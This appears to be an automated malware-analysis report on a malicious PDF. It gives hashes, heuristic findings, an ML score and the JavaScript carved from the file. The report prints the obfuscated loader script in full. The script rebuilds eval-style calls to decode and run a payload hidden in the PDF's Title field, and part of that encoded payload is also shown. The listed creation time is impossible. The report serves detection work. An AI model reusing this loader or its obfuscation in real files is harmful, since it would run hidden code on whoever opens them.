PDF malware analysis — malicious · 3de239bb6a2155cd

MALICIOUS

PDF

21.2 KB Created: 2010-11-23 54:61:00 Authoring application: String.fromCharCode First seen: 2026-05-07

MD5: 1a8acce3e4cb290203f88aaf609b1f11 SHA-1: b32dfc50e2d9bb1053e6e6ec99a6721a86ef48c2 SHA-256: 3de239bb6a2155cd310c2e0bfc05d2d0f0503cc644f846baba7ece8b6f084189

114 Risk Score

Malware Insights

MITRE ATT&CK

T1059.001 PowerShell

The PDF file contains embedded JavaScript, indicated by multiple heuristic firings including 'PDF_JAVASCRIPT' and 'PDF_JS'. The ML classifier strongly flags this PDF as malicious. The embedded JavaScript, found in 'javascript_obj0001_000.js', is likely intended to perform malicious actions upon opening the document, such as downloading a second-stage payload. The presence of 'String.fromCharCode' further suggests obfuscation techniques common in malicious JavaScript.

Machine Learning

Nyx PDF Classifier malicious score 1.0000

Heuristics 3

JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.

Matched line in script

/Title (10lkf118lkf97lkf114lkf32lkf98lkf106lkf115lkf103lkf61lkf34lkf37lkf117lkf57lkf48lkf57lkf48lkf37lkf117lkf57lkf48lkf57lkf48lkf37lkf117lkf49lkf54lkf69lkf66lkf37lkf117lkf70lkf70lkf66lkf57lkf37lkf117lkf48lkf48lkf48lkf54lkf37lkf117lkf56lkf66lkf48lkf48lkf37lkf117lkf50lkf52lkf51lkf52lkf37lkf117lkf70lkf55lkf56lkf57lkf37lkf117lkf51lkf69lkf56lkf48lkf37lkf117lkf55lkf52lkf69lkf57lkf37lkf117lkf65lkf67lkf48lkf54lkf37lkf117lkf54lkf65lkf51lkf52lkf37lkf117lkf69lkf50lkf65lkf65lkf37lkf117lkf67lkf51lkf70lkf65l …
/Producer (String.fromCharCode)
/Subject (ev2011)

Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

javascript_obj0001_000.js pdf-javascript-stream PDF /JS object 1 at offset 0xA 593 bytes

Filename	Kind	Source	Size
`javascript_obj0001_000.js`	pdf-javascript-stream	PDF /JS object 1 at offset 0xA	593 bytes
SHA-256: `d56120de8d41ad4678aa89fbe030cd7c9e0dac020c8da1c1d173b034860e5925`
Preview script First 1,000 lines of the extracted script try { var d=Function; var date = new Date(); var q=date.getFullYear(); var uhvxc = "replac" + "e"; var dsaal='ald', sdhi='id', dsaaod='ods'; al=dsaal.substr(0,2); fdsor=sdhi.substr(0,2); od=dsaaod.substr(0,2); b=''; e="." + "tooo"[1-1] + "it"; e+="le"; d('sfd','j=thi' + 's'+e)(); d('lh','k='+'this'+'.subject')(); var g=k.replace(q, al); d('dasda','l='+'this.'+g)(); h='pr20' + new String(11); h+='uceras'.substr(0,4); h=l('h.replace(q,od)'); d('ads','i='+'this.'+h)(); m=l(i); j=j.split("lkf"); n = l(j) for(i = 0; i < n.length; i++) { o = n[i]; b+=m(o); } l(b); }catch(e){}

SHA-256: d56120de8d41ad4678aa89fbe030cd7c9e0dac020c8da1c1d173b034860e5925

Preview script

First 1,000 lines of the extracted script

try {

var d=Function;
var date = new Date();
var q=date.getFullYear();
var uhvxc = "replac" + "e";
var dsaal='ald', sdhi='id', dsaaod='ods';
al=dsaal.substr(0,2);
fdsor=sdhi.substr(0,2);
od=dsaaod.substr(0,2);
b='';
e="." + "tooo"[1-1] + "it";
e+="le";
d('sfd','j=thi' + 's'+e)();
d('lh','k='+'this'+'.subject')();
var g=k.replace(q, al);
d('dasda','l='+'this.'+g)();

h='pr20' + new String(11);
h+='uceras'.substr(0,4);

h=l('h.replace(q,od)');
d('ads','i='+'this.'+h)();


m=l(i);


j=j.split("lkf");
n = l(j)


for(i = 0; i < n.length; i++) {

o = n[i];
b+=m(o);
}

l(b); 

}catch(e){}

Open this report in the interactive analyzer, or submit your own file for analysis.